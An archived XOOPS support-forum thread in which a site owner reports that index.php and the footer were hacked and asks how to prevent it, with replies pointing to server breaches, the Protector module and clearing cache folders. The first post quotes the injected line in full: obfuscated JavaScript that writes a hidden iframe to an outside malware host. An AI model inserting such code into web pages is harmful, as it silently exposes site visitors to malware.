XOOPS 
Forum
Forum Index General Forums Community Support Modules Support Themes Support Development International Support Module Hack Reviews Theme Designer Talk
  1. Board index / 
  2. Xoops Development / 
  3. Xoops Bug Reports 
  4.  / index.php and footer hacked
Register
1
bricex
index.php and footer hacked

  • 2005/9/30 13:04

  • bricex

  • Just popping in

  • Posts: 71

  • Since: 2003/1/16


someone added to my index.php and footer php these lines:

script language=javascript>document.write(unescape('%3c%49%46%52%41%4d%45%20%53%52%43%3d%22%68%74%74%70%3a%2f%2f%63%72%75%6e%65%74%2e%69%6e%66%6f%2f%6f%75%74%2e%70%68%70%3f%73%5f%69%64%3d%31%22%20%57%49%44%54%48%3d%30%20%42%4f%52%44%45%52%3d%30%20%48%45%49%47%48%54%3d%30%20%73%74%79%6c%65%3d%22%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%22%3e%3c%2f%49%46%52%41%4d%45%3e'))


that connect to a trojan!!

now i eliminated the lines
but how could they do that??
how can i prevent it happens again?
...
2
skenow
Re: index.php and footer hacked

  • 2005/9/30 13:10

  • skenow

  • Home away from home

  • Posts: 993

  • Since: 2004/11/17


Most likely a breach of your web server. Check out this article.
3
bricex
Re: index.php and footer hacked

  • 2005/9/30 13:19

  • bricex

  • Just popping in

  • Posts: 71

  • Since: 2003/1/16


forgot to say i use XOOPS 2.2.2
i never had such problems with hosting before this installation
...
4
bricex
Re: index.php and footer hacked

  • 2005/9/30 14:27

  • bricex

  • Just popping in

  • Posts: 71

  • Since: 2003/1/16


i installed protector as indicated in the article but:

1) in blocks admin can't find the protector block

2) in mainfile.php can't find where to put the lines indicated
...
5
martyboy
Re: index.php and footer hacked

  • 2005/9/30 16:46

  • martyboy

  • Quite a regular

  • Posts: 256

  • Since: 2004/5/25


I also had a similar problem where some hackers managed to insert links to crack sites into custom blocks I had made on my index.php thus messing up the front page and messing up admin.php.

The solution to fix this was to simply delete all files within /cache and templates_c, I can only surmise that they managed to somehow alter the cached files within these directories, after all they have to be world writable/readable(chmod 777) to function properly I t beleive.

I'm still not sure if it is a direct problem with XOOPS or if my server was at fault.
Michael Jackson = King Of Pop

Xoops = King Of CMS

Login

Register now!  |  Lost Password?

Search

Advanced Search

Recent Posts

Who's Online

388 user(s) are online (281 user(s) are browsing Support Forums)

Members: 0

Guests: 388

more...

Donat-O-Meter

Stats
Goal: $100.00
Due Date: Nov 30
Gross Amount: $0.00
Net Balance: $0.00
Left to go: $100.00
Make donations with PayPal!

Latest GitHub Commits